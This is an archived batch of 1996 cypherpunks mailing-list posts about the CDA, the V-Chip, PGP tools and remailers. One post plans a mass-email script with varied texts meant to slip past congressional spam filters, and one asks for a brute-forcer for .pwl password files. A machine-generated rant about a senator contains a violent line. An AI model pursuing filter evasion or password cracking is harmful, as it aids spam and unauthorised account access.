At 1:57 AM 2/10/96, Mark Allyn (206) 860-9454 wrote:
>Allright. That does it.
>
>I am going to volunteer to try to make a perl script that
>I will make available that will automatically email every
>congressman that has an email address. I will include a pre
>pared text of the email message. All you would have to do is
>to sign it and it would send the same message to all of them
>with email addresses automatically. I can even have it have
>several prepaired texts so that they are all slightly different
>so that any funky gatekeepers at the congress email sites that
>attempt to keep out spams could be defeated.
>
>What do you think? Is this worth it?


Here's something I did about Senator James Exon:

My complaint about James Exon

I would like to take a moment to comment on James Exon's statements. What
follows is a set of observations I have made about inane zombies. I truly
suspect that his opinion is a lazy cop-out. If he gets his way, I might
very well kill somebody. This is explicitly or implicitly expressed or
presupposed in most of the material I plan to present. To Exon, terrorism
is a kind of religion. This is not the first time we've had trouble with
unreasonable goofy-types, and it certainly won't be the last. His claims
are a cesspool of alarmism.

If you need proof that he is off his rocker, then just take a look at him.
Exon has a driving need to reduce human beings and many other living
organisms to engineered products and mere cogs in the social machine.
Ostensibly, he does not intend to insult my intelligence, but in fact,
insipid porn stars like him tend to conveniently ignore the key issues of
this or any other situation. Speaking of insincere megalomaniacs, it would
be downright ungrateful for him to censor any incomplicitous principles.
It's a sad world where fickle worthless-types have the power to feed us a
diet of robbery, murder, violence, and all other manner of trials and
tribulations. After all, I myself unequivocally maintain that Exon should
take more responsibility for his actions. To put it another way, he likes
to have difficult social issues presented to him in simple, black-and-white
terms.

I don't see how he can be so abusive. That doesn't necessarily mean that he
is intentionally being stupid. Rather, it means that his attempts to turn
the trickle of alcoholism into a tidal wave are just a game to him.
Although Exon has tremendous popular appeal, Exon has come very, very close
to making me defend my rights. He should just quit whining about
everything. He feels he has not only a right, but also a duty, to toy with
our opinions. His idea of a good time is to torture jealous radical
hedonists. An inner voice tells me that Exon's claims are pure tripe. To
sum it all up, pesky deranged moviegoers like James Exon often think they
have the right to flush all my hopes and dreams down the toilet.


-Tim May

P.S. As many of you may already know, a "rant generator" can be found at
http://www-csag.cs.uiuc.edu/individual/pakin/complaint

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Small <small@nethole.com>
Date: Sun, 11 Feb 1996 11:57:15 +0800
To: cypherpunks@toad.com
Subject: glide.c??
Message-ID: <199602092027.UAA04128@ex500.saic.com>
MIME-Version: 1.0
Content-Type: text/plain



DO you know where I can find glide.c , or (newer) to bruteforce
.pwl files?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Zychik <jzychik@via.net>
Date: Sat, 10 Feb 1996 18:16:04 +0800
To: cypherpunks@toad.com
Subject: Re: Req. for soundbites
Message-ID: <2.2.32.19960210050116.006a6880@via.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:08 PM 2/9/96 +0600, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>A local TV station has asked me for an interview, after I sent a graphic of
a mono-digital hand gesture with the phrase "censor this!" to the Prez,
Veep, and the area congresscritters (cc'd to 2 TV stations and a radio
station), accompanied by a 'confession' and demand for swift prosecution.
>
>Anyone got any nifty sound bites I can try to toss in?

This guy has some Congressional Soundbites on his site:

Damon Lust
http://www.lust.org/~damon/


I didn't stay around to listen to them. But, his head seems to be in the
right place.
He refers to Congress as Corporate Pyscho Criminals.


jz

Publisher of the Zychik Chronicle.
To subscribe send e-mail with sub-cy in the header





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sat, 10 Feb 1996 06:35:09 +0800
To: cypherpunks@toad.com
Subject: The Resistor
Message-ID: <Pine.SUN.3.91.960209210818.6603D-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone out there know where I can find the latest issues of a 
magazine called The Resistor?

Sean Gabb
Editor,
Free Life
======================================================================
    $$$$$$  $$$$$   $$$$$$  $$$$$$     $$      $$   $$$$$$  $$$$$$
    $$      $$   $  $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$$$    $$$     $$$$    $$$$       $$      $$   $$$$    $$$$
    $$      $$ $    $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$      $$   $  $$$$$$  $$$$$$     $$$$$$  $$   $$      $$$$$$
 
        A Journal of Classical Liberal and Libertarian Thought

    Production:                                   Editorial:
    c/o the Libertarian Alliance                  123a Victoria Way
    25 Chapter Chambers                           Charlton
    London SW1P 4NN                               London SE7 7NX

Tel: **181 858 0841  Fax: **171 834 2031  E-mail: cea01sig@gold.ac.uk

                    EDITOR OF FREE LIFE:  SEAN GABB
______________________________________________________________________

How to subscribe:  Send cheque for GBP10 or US$20 made out to the
                   Libertarian Alliance.
======================================================================
                 FOR LIFE, LIBERTY AND PROPERTY
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Sat, 10 Feb 1996 18:19:23 +0800
To: cypherpunks@toad.com
Subject: Your Point Is ?
Message-ID: <m0tl7ch-000V5lC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Because, the are dumb as shit.  It's simple really, back to the
> origional point, most people are about as bight as a rock, they
> don't care about anything other than stuffing there pathetic faces,
> waching the idoit box, and passing on their bad genetic structure
> and pathetic world view.  That is all they have, it's not that they
> have anything to contribute to the world.  They are pathetic, since
> they have no life, and know that their world view hasn't got a
> prayer in a free market place of ideas, they choose to maintain it
> by force.
> 
I'm sorry. I seem to have missed your point. I thought you made one 
in the above text.  But after that, you seemed to have grouped 
yourself with those braindead no-lifers.  Where did YOU lose ME? 
<VBG>.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRwopHZBD5a0GJkxAQGkUAQAwnKZ9E9znTul/abjiH/bYEMoJnlY27mE
2Ylk37HZWp3g9JVNmF0YvZWWsw1l3B+lzu1SC8GgG4V9h7Q483d4o0Nj995qVhhu
TQTkimH7XM0KH9Cc6Rw1PgcoZPaQgjjQg+loA1/N9lwCa9GZc2hTQlvDF/qV8d9B
wAxEpKGca9o=
=I0yG
-----END PGP SIGNATURE-----

Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tripp Hardy <mhh@tripper.netkonect.co.uk>
Date: Sat, 10 Feb 1996 06:49:22 +0800
To: "'Adam Philipp'" <cypherpunks@toad.com>
Subject: RE: PGP & Seamless Pegasus
Message-ID: <01BAF734.1BFF82C0@tripper.netkonect.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Let's not celebrate just yet.  While it is a great improvement, it still causes errors if you try to encrypt an attached file and conventional encryption still doesn't work here.  The only one that is working all around for me is Private Idaho.  We are moving in right direction though.

Tripp

----------
From:  Adam Philipp[SMTP:adam@sub.toad.com]
Sent:  Friday, February 09, 1996 4:34 AM
To:  cypherpunks@toad.com
Subject:  PGP & Seamless Pegasus

-----BEGIN PGP SIGNED MESSAGE-----

Can I just add a loud HURRAH! on the integration of PGP and Pegasus 
using the PGPJN add-on. 

It is by far the smoothest melding of PGP and a e-mail routine to 
date. The only way it would be smoother is on one program. THe 
learning curve is also negligible. 

For all those griping about no good PGP windoze e-mail programs, your 
wait is over. This mail program won over a die hard Eudora fan in 
about 15 minutes... Someone else already posted the sites to get this 
so forgive my laziness of not repeating their words.

Oh, did I mention this is seamless under Windoze 95 as well?


Adam, Esq.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRs/RAaMHlrz9swxAQGWUwf/amggouHkGjrjoYQ3JXYXiWblHc2NBvQx
wwy1jMSvEEiP0kQD1iaysA6fw4t+xU1bFAftqACRa3rTF7ZgCRRgFuhgwTwhwR8u
HZ8zDed5PIgywsn9/jqXW+nqneNx2uboUjq7FsncZiC7EG90/SMK78et8QZ/sT0l
ifiCvoLXaYhW4anmIeHMADLwDRqUlhVWX5RX1ccG2MrOrrrKHjJcveG4CF72M8EV
hftXDTWdElUuPUHD0JUBlp555+YMuolSUuu4sq1eodwlX0L4tq9vv4QBCwnBvq0H
4XONwa9BaRvEjVJ0Gg6+HjC4/IHOt/5CJ+SfwvQAaysH7Q11nkKTZw==
=/zQA
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 10 Feb 1996 18:16:10 +0800
To: cypherpunks@toad.com
Subject: Re: IBM, RSA Security
Message-ID: <199602100521.VAA08049@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>London, 9 February 1996 -- IBM UK has revealed a little
>more of the detail surrounding its deal with RSA Data
>Security for the Big Blue range of SecureWay Internet
>security products and services.

It's certainly nice to see such a range of products coming
out of a non-US site, and from IBM at that!

Does anybody know if they're using RSAREF-compatible software
as part of their system?
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Sat, 10 Feb 1996 18:16:14 +0800
To: cypherpunks@toad.com
Subject: Hey, didn't he used to be...?
In-Reply-To: <m0tkPbC-00093KC@pacifier.com>
Message-ID: <v03004b03ad41d8db0825@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


At <http://www.us.net/~steptoe/welcome.htm>, there is a link to a paper by
Stuart A. Baker, formerly (if I remember correctly) NSA's Chief Counsel.

     EMERGING JAPANESE ENCRYPTION POLICY
     by
     Stewart A. Baker


Acouple of choice paragraphs:

Japan's encryption policymaking is in its early stages, but there are
strong signs that encryption is increasingly seen as a key technology for
improving Japan's penetration of the Global Information Infrastructure. A
highly selective (and possibly biased) sampling of informed Japanese
opinion on cryptography suggests a growing determination to treat
cryptography as a national Japanese economic priority.

- and -

For a variety of reasons, commercial interests are predominant in Japanese
government thinking about encryption. Time after time during my interviews,
I was reminded that Japan was an island nation that has not had to defend
itself for fifty years and so has not had to confront the national security
concerns associated with encryption. And Japanese police face severe
political and constitutional constraints on wiretapping, so the prospect of
losing this criminal investigative tool seems not to be as troubling to the
Japanese government as to the United States and many European nations.


There's lots more here, and I haven't read it all.


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@vishnu.alias.net>
Date: Sun, 11 Feb 1996 11:57:54 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Updated type2.list/pubring.mix
Message-ID: <Pine.BSD.3.91.960209212656.15696C-100000@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just put up an updated type2.list/pubring.mix on 
vishnu.alias.net. I took armadillo out as it has not been responding to 
pings or to requests to the owner as to it's status. If I hear from the 
owner, I'll add it back.

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6b4, a Pine/PGP interface.

iQEVAwUBMRwRFKghiWHnUu4JAQEeAwf+N+3sIloKkhVXqb2TnjpVt6UsmVyUcL6H
ZkO2bck/9BsI8DBedr7hyxUni8ZUUOxN0SFZacoTbsvzOFeesYtRHNilApVq+qq/
ZaO3B2DOUyWbMMMtSRoMgjVDvzvmGmw6Z7Ayq6P1z6elWn9Jd+MqWSOjiv3qSSnu
SbJmSvnT69eokrXxNSsmIQMRGxdH+r4A5i5iKN6x/9cNxl7AK55i6x10bcxEI5Yo
BF2/3tsZiR664wIwrVRk2srdWfnOIAdvnsQbzJV3so57GvBfUid0JbBC96mThYHR
Fs5m6PH9A7g5TXveNyylIFQZFRFyD2cq6QBGtPos0DFyAKn/6bp4aQ==
=1hD1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 10 Feb 1996 11:39:27 +0800
To: cypherpunks@toad.com
Subject: Black DaveMail: I Promised My Grandfather
Message-ID: <v02120d01ad41ba126c80@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Fri, 9 Feb 1996 08:53:06 -0800
To: haeberli@apple.com (Martin Haeberli -- Apple),
        rmiller@telematica.com (Richard Miller), davenetworld@wired.com,
        mquinn@netcom.com, idig@nbn.com (David Biedny),
        rick_lepage@macweek.ziff.com, jlg@be.com (Jean-Louis Gassee),
        alecs@microsoft.com (Alec Saunders),
        combee@techwood.org (Benjamin L. Combee),
        pmcq@utxvms.cc.utexas.edu (Pam McQuesten),
        ivan.myrvold@grimstad.nett.telenor.no
From: dwiner@well.com (DaveNet email)
Subject: I Promised My Grandfather
Sender: owner-davenetworld@wired.com
Precedence: bulk

---------------------------------------
Amusing Rants from Dave Winer's Desktop
Released on 2/9/96; 8:46:03 AM PST
---------------------------------------

  I said: "I'm voting against Clinton in November."

  Kyle D. Skrinak, kylesk@nando.net, said: "Perhaps I missed it, but
  may I suggest you declare who you intend to support. Outside of a
  libertarian candidate, I am unfamiliar with which presidential
  candidate would be against this censorship.

  Fair enough. A lot of people asked that question. And Mr. Skrinak
  asked it with respect.

  My answer: I don't know!

  I can say I'm going to vote against Clinton without saying who I'm
  going to vote for. That's my right as a US citizen.

  It's only February. The US presidential election is in November.
  There's lots of time. Between now and November the web will grow by an
  order of magnitude. Try to remember what it looked like in June 1995.
  It was a sleepy backwater then, even though it looked like a boom. We
  still have spring, summer and fall before we have to make a choice.
  Perhaps even Clinton can get my vote. But he's got a bunch of digging
  (and explaining!) to do.

  People have also questioned my use of the term "crime against
  humanity" to describe the attempted censorship of the Internet.
  People say I'm off here, not in direction, but in scale. They ask how
  can you compare this act with the other acts that have been called
  crimes against humanity?

  I have two answers. First, it's a felony to leave the scene of an
  accident, and it's a felony to blow up a Federal courthouse in
  Oklahoma City. Scale has nothing to do with it. If this isn't a crime
  against humanity, who is it a crime against? Do we hold our
  politicians accountable for their actions, especially if they're
  on a global scale? Are just US citizens offended by their attempt to
  shut down free speech on the Internet? No. The mail has been coming in
  from all over the planet. And rightly so. This act has global
  implications.

  Second, I made a promise to my grandfather to oppose this kind of shit.
  I'm a first-generation US citizen. Both sides of my family left
  Europe, fleeing Hitler, for their lives! I listened to my parents and
  grandparents. I've read about this stuff. How did Hitler start? How
  many people said "It can't happen here!" And how sorry were they
  later, when they couldn't do anything about it but run for their
  lives.

  Well, it's still early, we *can* do something about it. These ideas
  must meet our resistance. I think it's our obligation, if not to
  humanity, to evolution and peace.

  ***It Can Happen

  Saying it's unconstitutional is like saying it can't happen here.
  You're trusting something that might not be trustworthy.

  A year ago, when the Exon amendment was first discussed, did you think
  that Congress could pass such a bill? It can happen. Did you think that
  Clinton would sign it? It happened. Could the courts go along with it?
  Hmmm. Could people go to jail? What do *you* think?

  The opposition is incredibly well financed and organized.
  According to the EFF they're distributing kits to federal
  prosecutors all over the country, teaching them how to prosecute
  under the new censorship law. They're going to make hay while the sun
  shines. Maybe the law is unconstitutional. Maybe the courts will say
  so. But for now, it's on the books, it's the law of the land. Can you go to
  jail for your opinions in the USA? According to the law -- yes. Some of
  us will go to jail. I think we know that now.

  Hey -- I'm pissed when I get a jury duty notice. Imagine how it would
  feel to get arrested for speaking my mind, for writing DaveNet? How
  would it feel to get convicted and sent to jail? I don't want to find
  out! I like my life. I want to be free. I don't want to be a prisoner!

  I made a promise to my grandfather, but I also made a promise to myself.
  I thought we had cleansed this kind of crap from our society after
  Vietnam. We lost a whole generation on that one. Let's not lose
  another one.

  Yes, it can happen here.

  It can happen anywhere, anytime.

  All it takes is your silence.

  Wake up!

  ***What a day!

  Yesterday was a day of great growth for me. It started at 4AM, writing
  my ode to Rick Smolan, entitled "Holding Hands in Cyberspace". Then
  it turns out I was wildly and unrealistically optimistic. I look at
  Rick's website, there's Al Gore, talking about the fucking
  environment! I want to believe Rick is a good guy, but the evidence
  indicates otherwise. I leave him a voicemail, explaining that our
  thirteen year friendship is in jeopardy. No answer. I feel I've
  misled my readers. So I retract my support for his project. A few hours
  later a blue ribbon shows up on his site. Click on it. Nothing happens.

  Is this good enough? No.

  I think Rick truly has a good heart. He wants to do the right thing, deep
  inside. But he didn't do the right thing.

  I can't support him. Can you have a friend who you can't support? No.

  I said in an email that this is the first time in my life that I didn't
  sell out for friendship. That's where the growth came from.

  In the early evening, I spoke with Howard Rheingold, hlr@well.com.

  He encouraged me to work something out with Rick. His magic words were
  -- "eventually Rick will thank you for doing this." That gets inside
  of me, it resonates.

  Howard is a great writer! I asked him to write something for DaveNet. I
  asked him to write about his day, yesterday -- his 24 Hours --
  something for Rick and others to think about.

  Here's what Howard said.

  ***Howard Rheingold speaks

  I got up this morning and headed for Planet Hollywood, a place I never
  would have stepped foot in otherwise, to do a panel with Paul Saffo and
  Esther Dyson. Illustra got this big to-do together weeks ago, as
  self-promotion leveraged on Rick Smolan's self-promotion.

  I thought Rick was doing a pretty cool thing, bringing people's
  attention to some of the pleasant and beneficial things happening in
  cyberspace. God knows we need as much of that as possible to counter
  the hysteria whipped up by Ralph Reed and buddies. Illustra seems
  like a cool product. Empowers people to publish. And they paid me.

  This morning turned out, through one of those weird accidents that
  history hands you, the day of the Web blackout. I blacked out my main
  page before I headed out this morning.

  The Illustra thing, frankly, was one of the biggest wasted
  opportunities I've ever seen. They did a great job getting a couple
  hundred interesting people together and then put on a boring
  blah-blah for hours.

  Then came the panel. I always take the opportunity to seize the
  subject and wrench it over to how the fuck are we going to look our
  children in the eyes ten years from now when they ask us what we were
  doing while a bunch of tiny-minded puritan fascists shat on
  liberties that Americans have died for. I think some people woke up.
  At least they said so. I hope I gave them something to talk about. I feel
  fine about the bux I took from Illustra to do the gig. And I felt fine
  about helping Illustra promote 24 Hours promote Illustra. Until I
  read my Davemail tonight.

  Rick. Be a journalist. You are the last hope on an ugly day.

  American journalists, with a few exceptions should hang their heads
  in shame. I'm one of the guys who gets the calls for the quotes and
  soundbites. For years. Ever since this Internet stuff started
  heating up. I've done ABC, CBS, NBC, CNN, BBC, NHK. I've done German,
  French, Austrian, Italian, Australian TV. I've given the quotes to
  the reporters from the New York Times, Washington Post, L.A. Times,
  and a hundred podunk papers. And every goddamn sound bite about
  democracy hits the cutting room floor and is replaced by the same
  idiotic shtick about cyberporn or sexual predators in chat rooms.
  Over and over again. For years.

  I have asked reporters whether they care about the kind of country
  their children grow up in. I literally got down on my knees and begged
  the last CBS crew that came out here. The reporters and field
  producers are sincere. There is some asshole sitting in LA or New York
  whose job it is to kill the stuff that isn't as shallow as a tin pan full
  of cold dogpiss, and substitute some off-the-rack sleaze.

  There is a code of ethics for journalists, and right up there at the top
  is a reminder that the press in a free society has an obligation to
  inform citizens about events that affect our freedom. Well,
  journalism is now a wholly-owned subsidiary of entertainment, and
  these journalists have loaded the shotgun, handed it to their
  enemies, dropped their trousers, bent over, and put the muzzles in
  their own asses. I believe most of the editors and producers who
  failed us so miserably have done it out of cluelessness more than
  malice or conspiracy or craven sucking-up-to-the-owners.

  The most important piece of legislation in the past fifty years took a
  year to work its way through Congress and is now law. A multi-trillion
  dollar industry has been divvied up. Do any of us know who really won
  and who really lost? Does anybody know about any of it except the
  cyberporn stuff? It was a sideshow, a juicy piece of meat to distract
  the watchdogs of our minds, while the real action took place
  elsewhere.

  I've been writing columns about this since 1994. So has Brock. Wired
  has been on the case. And very few others.

  It isn't just the politicians who deserve our wrath, the craven
  cowards. It's the journalists and their bosses.

  But history handed us this delicious opportunity. After a year of
  failure to get the attention of the New York Times and CNNs of the
  world, Rick Smolan, media lubricator extraordinaire, managed to
  get a lot of attention focused on something happening on the Net that
  *isn't* sinister.

  And now Dave Winer tells us that Rick isn't going to acknowledge the
  Web blackout.

  Rick, it's this simple. You are a journalist. You chose February 8 as
  your day to cover. To ignore the anti-CDA protest that is one of the
  biggest stories on the day you chose to cover months ago is to abrogate
  the right to ever call yourself a journalist again.

  It isn't too late. I know this is a headache you didn't ask for.
  Sometimes history asks people to make a judgement call at a bad time.
  Sometimes people regret the decisions they failed to make. We have an
  opportunity here to use all the attention you have masterfully
  focused on this event to shed some light. You gotta do it.

  Acknowledge the protest.

  ***One more screed

  The following story has been floating around the net, attributed to
  Charles Phillip Whitedog. I don't have an email address for Mr.
  Whitedog. His signature reads "Charles Phillip Whitedog, Ojibway
  and Network Man; Multimission Ground Systems Office (Mission
  Control); Jet Propulsion Laboratory, NASA

  "About 1966 or so, a NASA team doing work for the Apollo moon mission
  took the astronauts near Tuba City where the terrain of the Navajo
  Reservation looks very much like the lunar surface. With all the
  trucks and large vehicles were two large figures that were dressed in
  full Lunar spacesuits.

  "Nearby, a Navajo sheep herder and his son were watching the strange
  creatures walk about, occasionally being tended by personnel. The
  two Navajo people were noticed and approached by the NASA personnel.
  Since the man did not know English, his son asked for him what the
  strange creatures were and the NASA people told them that they are
  just men that are getting ready to go to the moon. The man became very
  excited and asked if he could send a message to the moon with the
  astronauts.

  "The NASA personnel thought this was a great idea so they rustled up a
  tape recorder. After the man gave them his message they asked his son
  to translate. His son would not.

  "Later, they tried a few more people on the reservation to translate
  and every person they asked would chuckle and then refuse to
  translate.

  "Finally, with cash in hand, someone translated the message: 'Watch
  out for these guys, they come to take your land.'"

  ***I felt sorry for him!

  I did eventually talk with Rick, and at 10:30PM I drove to San
  Francisco to get my picture taken by him, and to chat with some of the
  people doing the "24 Hours in Cyberspace" project. Rick had been up
  for 36 hours. You could tell. Look in his eyes. He's barely standing
  up. I felt sorry for him!

  We don't understand each other. Yes, there is a blue ribbon on the 24
  Hours website, <http://www.cyber24.com/>. Cooool -- kind of. But
  it doesn't go anywhere, it's not a link. It's just a picture.

  And in that I think we have the perfect metaphor for Rick's project.

  Smolan could be an online journalist if he wants to be one. By an
  accident of history, he could have been a *great* online journalist.
  In a real sense, the first one. Welcome Rick! I said in "Holding Hands
  in Cyberspace".

  ***But...

  Imagine running CNN on the day of a big plane crash.

  And not covering it. (That sounds like an Alanis Morissette song!)

  You have the co-pilot of the plane on camera.

  And he talks drivel about the global environment.

  Ouch!

  Rick was asleep during his 24 Hours.

  But, as Howard says, there's still time.

  For me, I've had to take a stand against a man I admire.

  And I hate that!

  So what?

  Dave Winer

  PS: The most eloquent rant I've seen on this stuff so far. Read it all
  the way thru. Be patient. Now you understand what's really going on.
  <http://www.hotwired.com/userland/steverussell_495.html>.

---------------------------------------------------------------------
Webmasters: <http://www.hotwired.com/userland/theblueribbon_489.html>

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 11 Feb 1996 11:57:21 +0800
To: Cypherpunks@toad.com
Subject: Re: A Rant about Senator James Exon
Message-ID: <v02120d07ad41be8e7a34@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 2/9/96, Timothy C. May wrote:

>P.S. As many of you may already know, a "rant generator" can be found at
>http://www-csag.cs.uiuc.edu/individual/pakin/complaint

Yes!

A Mass Rant-Spam!

I'm inspired!

Too bad we can't break the CDA in the process...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 18:14:58 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Req. for soundbites
Message-ID: <v01530507ad41e9cf07af@[206.138.118.105]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>A local TV station has asked me for an interview, after I sent a graphic
>of a mono-digital hand gesture with the phrase "censor this!" to the Prez,
>Veep, and the area congresscritters (cc'd to 2 TV stations and a radio
>station), accompanied by a 'confession' and demand for swift prosecution.
>
>Anyone got any nifty sound bites I can try to toss in?

I think a few of this sig quotes I've seen float through here would be
apprapo.  It has the be short and concise, and be easily understood by both
side of the issue.  Insulting or alienating the do-gooders with a quote
that could follow us around for awhile would not be in our best interest.
Some good ones I've collected are:

"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety."
-- Benjamin Franklin (1773)

"It is not the function of our Government to keep the citizen from falling
into error; it is the function of the citizen to keep the Government from
falling into error."
Robert H. Jackson (1892-1954), U.S. Judge


"To sin by silence instead of protest makes cowards out of men."
-- Abraham Lincoln

"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

Let's hear some more.


lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

Digitally sign your mail too!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 10 Feb 1996 18:05:28 +0800
To: cypherpunks@toad.com
Subject: The V-Chip glass is half full
Message-ID: <199602100721.XAA18354@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As a incurable optimist, I would like to offer a view contrary to all the
V-Chip doom and gloom.

Consider the Movie rating system as a precedent.  In the old days there was
a rating system in Hollywood which made it impossible to show a married
couple sleeping in the same bed.  This situation is analogous to modern TV
where George Carlin's 7 naughty words may not be spoken.

Contrast that with today's movies.  There is a much wider latitude about
the movies you can make and distribute.  All you have to do is label them
NC-17, R. or X and you are clean.  Of course, there are newspapers which
will not allow you to advertise and theaters which will not show the
X/NC-17 movies, but that's the way the market works.

With some luck, we will be able to see on TV what we can now see in the
movie theater, and the prudes will screen it out with the V-Chip the same
way they now screen it out with the movie rating.  Everyone is (more or
less) happy.

Panglossianly yours - Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@onramp.net (Allen B. Ethridge)
Date: Sat, 10 Feb 1996 18:16:10 +0800
To: cypherpunks@toad.com
Subject: Re: V-Chip Settings Escrow
Message-ID: <v02140b00ad41df31373d@[199.1.11.213]>
MIME-Version: 1.0
Content-Type: text/plain


>At 7:03 PM 2/9/96, Alexander Chislenko wrote:
>
>>  Now if your child wants to go over to Billy's, you may want to call
>>Billy's mom and ask her what her V-Chip settings are.
>>Do not forget to ask her when was the last time she beat Billy at any computer
>>game...
>
>It seems to me that by the logic--and possibly the direct language--of the
>Communications Decency Act, parents who "expose" the children of others to
>higher levels of V-Chip ratings than they get at home would themselves be
>liable.
>
>Plus, how long will it be before Children's Protective Services interviews
>children at their schools to determine if parents have set their V-Chip
>levels too high?

When i was a child we were taught in school that our society was better
than the USSR's 'cause (( wow, the CD i'm playing on my computer just said
"shit"! ) er, ah, excuse me ) children were encouraged to spy on their
parents and turn them in and wouldn't it be horrible if we American
children had to do the same.  As an adult in my twenties i discovered that
children were being encouraged to spy on their parents and turn them in
here in the wonderful USA, in the Holy Name of the War on Drugs (everybody
in my family gets their psychotropic drugs by perscription now so we're all
safe).  It's already too late.

Unless there's another youth revolution maybe?  First the twenties, then
the sixties, next the double noughts?  Dare i hope?

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 10 Feb 1996 18:20:58 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <199602100357.TAA22245@ix10.ix.netcom.com>
Message-ID: <Pine.OSF.3.91.960209234409.8558A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 9 Feb 1996, Bill Stewart wrote:

> How are you going to _know_ that a "violation" occurred, if company A
